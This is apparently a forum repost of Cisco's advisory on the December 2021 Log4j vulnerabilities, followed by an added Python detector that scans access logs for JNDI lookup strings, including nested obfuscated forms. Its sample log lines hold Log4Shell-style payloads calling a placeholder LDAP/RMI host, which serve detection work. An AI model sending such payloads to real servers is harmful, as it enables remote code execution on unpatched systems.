Cisco Security Advisory - Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021

Started by Netwörkheäd, March 28, 2022, 06:13:19 PM


Netwörkheäd

Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021

<p><strong>Critical Vulnerabilities in Apache Log4j Java Logging Library</strong></p>
<p>On December 9, 2021, the following critical vulnerability in the Apache Log4j Java logging library affecting all Log4j2 versions earlier than 2.15.0 was disclosed:</p>
<ul style="list-style: none;">
<li>CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints</li>
</ul>
<p>On December 14, 2021, the following critical vulnerability, which affects certain Apache Log4j use cases in versions 2.15.0 and earlier, was disclosed:</p>
<ul style="list-style: none;">
<li>CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack</li>
</ul>
<p>On December 18, 2021, a vulnerability in the Apache Log4j component affecting versions 2.16 and earlier was disclosed:</p>
<ul style="list-style: none;">
<li>CVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation</li>
</ul>
<p>On December 28, 2021, a vulnerability in the Apache Log4j component affecting versions 2.17 and earlier was disclosed:</p>
<ul style="list-style: none;">
<li>CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration</li>
</ul>
<p>For a description of these vulnerabilities, see the <a href="https://logging.apache.org/log4j/2.x/security.html" rel="nofollow">Apache Log4j Security Vulnerabilities</a> page.</p>
<p><strong>Cisco's Response to These Vulnerabilities</strong></p>
<p>Cisco assessed all products and services for impact from both CVE-2021-44228 and CVE-2021-45046. To help detect exploitation of these vulnerabilities, Cisco has released Snort rules at the following location: <a href="https://www.snort.org/advisories/talos-rules-2021-12-21">Talos Rules 2021-12-21</a></p>
<p>Product fixes that are listed in this advisory will address both CVE-2021-44228 and CVE-2021-45046 unless otherwise noted.</p>
<p>Cisco has reviewed CVE-2021-45105 and CVE-2021-44832 and has determined that no Cisco products or cloud offerings are impacted by these vulnerabilities.</p>
<p>Cisco's standard practice is to update integrated third-party software components to later versions as they become available.</p>
<p>This advisory is available at the following link:<br><a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd" rel="nofollow">https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd</a></p>

Security Impact Rating: Critical

CVE: CVE-2021-44228, CVE-2021-44832, CVE-2021-45046, CVE-2021-45105
Source: Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021
Let's not argue. Let's network!
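The advisory above points at Snort rules for detecting exploitation attempts against the JNDI lookup in CVE-2021-44228. As an added example, not part of the advisory, of this post, or of Cisco's rules, here is a small Python detector that scans web-server access-log lines for `${jndi:...}` lookup strings the way such rules do. It first resolves nested Log4j lookups so that a `jndi` keyword assembled from `${lower:...}`, `${upper:...}` or the `${x:-y}` default-value syntax is still caught, which is the caveat a detection engineer would want. The log lines and the host name `lookup-host.example` are constructed sample data, not indicators from the advisory.

```python
import re
from collections import Counter

# Constructed sample access-log lines (not from the advisory); the host name
# "lookup-host.example" is a placeholder, not a real indicator.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:10:01:22 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:23 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://lookup-host.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:24 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:J}ndi:rmi://lookup-host.example/b}"',
    '10.0.0.3 - - [10/Dec/2021:10:01:25 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 512 "-" "curl/7.68.0"',
]

# An innermost lookup: "${...}" whose body contains no further "$", "{" or "}".
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# What we are looking for once nesting has been resolved.
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_inner(match):
    """Resolve one innermost lookup. Only the string-manipulation forms are
    rewritten; any other lookup (jndi, env, ...) is kept exactly as-is so it
    stays visible to the final match."""
    body = match.group(1)
    if ":-" in body:                      # ${name:-default} -> default
        return body.split(":-", 1)[1]
    if ":" in body:
        name, arg = body.split(":", 1)
        if name.strip().lower() in ("lower", "upper"):
            return arg                    # case is ignored by the final match
    return "${" + body + "}"


def normalize_lookups(text: str) -> str:
    """Repeatedly resolve innermost lookups until nothing changes, so that
    '${${lower:j}ndi:...}' becomes '${jndi:...}'."""
    while True:
        resolved = _INNER_LOOKUP.sub(_resolve_inner, text)
        if resolved == text:
            return resolved
        text = resolved


def is_jndi_lookup_attempt(line: str) -> bool:
    """True when the line contains a JNDI lookup after nesting is resolved."""
    return _JNDI_LOOKUP.search(normalize_lookups(line)) is not None


def scan_log(lines):
    """Return the matching lines and a per-source-IP count of matches."""
    hits = []
    by_source = Counter()
    for line in lines:
        if is_jndi_lookup_attempt(line):
            hits.append(line)
            by_source[line.split(" ", 1)[0]] += 1   # first field is the client IP
    return hits, by_source


if __name__ == "__main__":
    hits, by_source = scan_log(SAMPLE_LOG_LINES)
    for line in hits:
        print("JNDI lookup attempt:", line)
    for ip, count in by_source.most_common():
        print(f"{ip}: {count} attempt(s)")
```

On the sample data the plain and the nested lookup lines are both flagged and attributed to the same source address, while the `${env:HOME}` line is left alone because only a `jndi` lookup is an exploitation attempt. A match here is a signal for triage, not proof of compromise: the lookup only fires on a vulnerable Log4j version that actually logs the field, so the inventory of affected products in the advisory is what decides the impact.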